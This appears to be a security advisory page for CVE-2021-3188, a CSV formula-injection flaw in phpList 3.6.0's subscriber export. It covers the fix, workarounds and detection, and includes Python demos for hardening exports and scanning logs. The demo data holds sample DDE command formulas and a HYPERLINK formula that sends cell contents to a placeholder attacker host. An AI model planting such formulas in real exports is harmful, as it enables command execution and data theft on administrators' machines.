CVE-2021-3188

9.8 CRITICAL

📋 TL;DR

CVE-2021-3188 is a CSV injection (formula injection) vulnerability in phpList 3.6.0. A value supplied through the email parameter is written unescaped into the subscriber CSV export, so a value beginning with =, +, -, @, a tab or a carriage return is stored as-is and, when an administrator opens the exported file in a spreadsheet application such as Excel or LibreOffice Calc, is evaluated as a formula rather than displayed as text. Depending on the application and its settings this can launch external commands through DDE (after the user accepts the warning prompts) or exfiltrate the contents of other cells through functions such as HYPERLINK. The issue affects phpList 3.6.0; any installation whose administrators use the subscriber export feature is exposed.

💻 Affected Systems

Products:
  • phpList
Versions: 3.6.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable path is the admin subscriber export at /lists/admin/exports. The formula payload is planted in a subscriber's email field and only does harm when an administrator exports the list and opens the resulting CSV in a spreadsheet application.

📦 What is this software?

phpList is an open-source, PHP-based newsletter and mailing-list manager. Administrators manage subscriber lists through a web interface under /lists/admin/ and can export subscriber data as CSV files.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A crafted cell executes a command on the workstation of the administrator who opens the export (for example a DDE payload evaluated by Excel), giving the attacker a foothold on an internal machine from which the rest of the network can be reached. Current Office builds disable DDE by default and prompt before launching an external application, so this outcome requires the user to click through those warnings.

🟠 Likely Case

The export is opened in a spreadsheet application and a formula cell exfiltrates the contents of other cells (for example through a HYPERLINK that the user clicks) or silently alters the data the administrator is looking at.

🟢 If Mitigated

With proper user training and security controls, impact is limited to possible leakage of the exported subscriber data itself.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account able to place a crafted value in a subscriber's email field (this page rates that as requiring admin-level access) plus an administrator who exports the list, opens the CSV in a spreadsheet application and accepts any formula or DDE warnings. No memory corruption or server-side code execution is involved; the server only stores and re-emits the payload.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.6.1

Vendor Advisory: https://www.phplist.org/news/phplist-3-6-1-release-notes/

Restart Required: No

Instructions:

1. Back up the phpList installation and its database.
2. Download phpList 3.6.1 (or later) from the official phpList site.
3. Replace the existing files with the new version, keeping your existing config.php.
4. Run the database upgrade step if the admin interface prompts for it.
5. Verify that the admin interface and the subscriber export work and report the new version.

🔧 Temporary Workarounds

Disable CSV Export (applies to: all)

Temporarily disable the subscriber CSV export in the admin interface until the upgrade is done, so no export can carry a stored payload to a workstation.

Input Sanitization (applies to: all)

Neutralize formula triggers at export time: for any field whose first character is =, +, -, @, a tab or a carriage return, prefix the value with a single quote, and make sure the field is quoted with any embedded double quotes doubled. Rejecting such values in the email field on input closes the path this CVE describes, but escaping at export protects every exported field, including ones this advisory does not mention.
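The following is an added example, not phpList code, showing the export behaviour described in the TL;DR beside the export-time neutralization suggested as a workaround. The subscriber records and the payload strings are constructed for the demonstration, and attacker.example is a placeholder host; phpList's real export code is not reproduced here.

```python
import csv
import io

# Leading characters that Excel and LibreOffice Calc treat as the start of a
# formula (OWASP CSV injection guidance): '=', '+', '-', '@', tab, carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed subscriber records, not real phpList data. The payloads are the
# classic DDE and HYPERLINK-exfiltration shapes; attacker.example is a placeholder.
SUBSCRIBERS = [
    {"email": "alice@example.com", "name": "Alice Example"},
    {"email": "=cmd|' /C calc'!A0", "name": "Mallory"},
    {"email": "bob@example.com",
     "name": '=HYPERLINK("http://attacker.example/?"&A1,"open")'},
    {"email": "-1+1+cmd|' /C calc'!A0", "name": "Trent"},
]


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return value[:1] in FORMULA_TRIGGERS


def neutralize(value: str) -> str:
    """Prefix a formula trigger with an apostrophe so the cell renders as text.

    Quoting of embedded commas and double quotes is left to the csv writer;
    both halves are needed for a safe export.
    """
    return "'" + value if is_formula_cell(value) else value


def _write(rows, transform):
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["email", "name"])
    for row in rows:
        writer.writerow([transform(row["email"]), transform(row["name"])])
    return out.getvalue()


def export_vulnerable(rows):
    """Mimics an export that copies stored values verbatim (the behaviour this CVE describes)."""
    return _write(rows, lambda v: v)


def export_hardened(rows):
    """Same export with every field neutralized before it is written."""
    return _write(rows, neutralize)


def find_injected_cells(csv_text):
    """Scan an existing export for cells a spreadsheet would evaluate.

    Returns (row_number, column_name, value) tuples; row 1 is the first data row.
    Useful for checking exports produced before the upgrade.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for number, row in enumerate(reader, start=1):
        for column, value in row.items():
            if value and is_formula_cell(value):
                hits.append((number, column, value))
    return hits


if __name__ == "__main__":
    unsafe = export_vulnerable(SUBSCRIBERS)
    safe = export_hardened(SUBSCRIBERS)
    print("--- vulnerable export ---\n" + unsafe)
    print("--- hardened export ---\n" + safe)
    print("flagged in vulnerable export:", find_injected_cells(unsafe))
    print("flagged in hardened export:", find_injected_cells(safe))
```

The apostrophe prefix is visible to anything that later parses the CSV programmatically, which is the accepted trade-off: a spreadsheet shows the cell as text and does not evaluate it. Note that the prefix also fires on legitimate values starting with a minus sign, so apply it only to exports meant for human consumption.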

🧯 If You Can't Patch

  • Restrict admin access, and in particular the ability to add or edit subscriber records and to run exports, to trusted users only.
  • Educate administrators never to double-click CSV exports into a spreadsheet application: open them in a text editor first, import them as text-only columns, and never accept a prompt asking to start an external application or update links.
  • Periodically check stored subscriber fields for values beginning with =, +, -, or @ and remove them before any export is taken.

🔍 How to Verify

Check if Vulnerable:

phpList 3.6.0 is affected. Read the version from the admin interface or from the VERSION constant, which phpList defines in admin/init.php rather than in config.php:

Check Version:

grep "define('VERSION'" /path/to/phplist/admin/init.php

Verify Fix Applied:

The command above, or the admin interface, reports version 3.6.1 or later.

📡 Detection & Monitoring

Log Indicators:

  • Export requests to /lists/admin/exports from admin accounts in unusual volume or outside normal working hours
  • Multiple failed (401/403) requests to the export URL, which may indicate an account probing for the export step
  • Subscriber records whose email or name field begins with =, +, -, or @ (these are stored payloads waiting for the next export)

Network Indicators:

  • CSV file downloads from the /lists/admin/exports endpoint, especially from addresses not normally used by administrators

SIEM Query (illustrative pseudo-syntax; adapt the source and field names to your platform):

source="phpList" AND (uri="/lists/admin/exports" OR filetype="csv")
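The log indicators above, as an added example that is not part of the original page: a small scanner over constructed web-server access log lines that groups export requests by client and account and flags bursts, repeated denials and off-hours exports. The log lines, IP addresses and timestamps are constructed; the export path comes from this page, while the alternative page=export marker and the thresholds are assumptions to be matched against your own logs and baseline.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; fields we do not need are matched loosely.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# "/lists/admin/exports" is the path this page names. "page=export" is an
# assumption about how a given deployment addresses admin pages; match on
# whatever your own access logs actually show.
EXPORT_MARKERS = ("/lists/admin/exports", "page=export")

# Constructed log lines: documentation-range IPs, invented timestamps.
SAMPLE_LOG = """\
203.0.113.5 - admin [12/Mar/2021:02:14:01 +0000] "GET /lists/admin/?page=subscribers HTTP/1.1" 200 5120
203.0.113.5 - admin [12/Mar/2021:02:14:20 +0000] "GET /lists/admin/exports?list=1 HTTP/1.1" 200 88213
203.0.113.5 - admin [12/Mar/2021:02:14:41 +0000] "GET /lists/admin/exports?list=2 HTTP/1.1" 200 90114
203.0.113.5 - admin [12/Mar/2021:02:15:03 +0000] "GET /lists/admin/exports?list=3 HTTP/1.1" 200 87730
203.0.113.5 - admin [12/Mar/2021:02:15:30 +0000] "GET /lists/admin/exports?list=4 HTTP/1.1" 200 91002
198.51.100.9 - editor [12/Mar/2021:09:30:12 +0000] "GET /lists/admin/exports?list=1 HTTP/1.1" 200 88213
192.0.2.77 - - [12/Mar/2021:11:02:55 +0000] "GET /lists/admin/exports?list=1 HTTP/1.1" 403 512
192.0.2.77 - - [12/Mar/2021:11:03:01 +0000] "GET /lists/admin/exports?list=2 HTTP/1.1" 403 512
192.0.2.77 - - [12/Mar/2021:11:03:09 +0000] "GET /lists/admin/exports?list=3 HTTP/1.1" 403 512
198.51.100.9 - editor [12/Mar/2021:09:31:00 +0000] "GET /lists/?p=subscribe HTTP/1.1" 200 2048
"""


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_export_request(path):
    return any(marker in path for marker in EXPORT_MARKERS)


def export_activity(log_text):
    """Group export requests by (client IP, user): successes, denials, hours seen."""
    stats = defaultdict(lambda: {"ok": 0, "denied": 0, "hours": set()})
    for line in log_text.splitlines():
        event = parse_line(line)
        if not event or not is_export_request(event["path"]):
            continue
        key = (event["ip"], event["user"])
        status = int(event["status"])
        if 200 <= status < 300:
            stats[key]["ok"] += 1
        elif status in (401, 403):
            stats[key]["denied"] += 1
        # Hour of day from "12/Mar/2021:02:14:20 +0000".
        stats[key]["hours"].add(int(event["ts"].split(":")[1]))
    return dict(stats)


def flag_suspicious(stats, burst=3, denied=3, business_hours=range(8, 19)):
    """Keys matching the page's indicators: an export burst, repeated denials,
    or a successful export outside business hours (thresholds are illustrative)."""
    flagged = []
    for key, s in sorted(stats.items()):
        off_hours = any(h not in business_hours for h in s["hours"])
        if s["ok"] >= burst or s["denied"] >= denied or (s["ok"] and off_hours):
            flagged.append(key)
    return flagged


if __name__ == "__main__":
    activity = export_activity(SAMPLE_LOG)
    for key, s in activity.items():
        print(key, s)
    print("flagged:", flag_suspicious(activity))
```

In the sample, the admin account pulling four lists at two in the morning and the unauthenticated client collecting 403s on the export URL are both flagged, while the single daytime export by the editor account is not. Tune the thresholds from a baseline of your own administrators' export habits before alerting on them.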
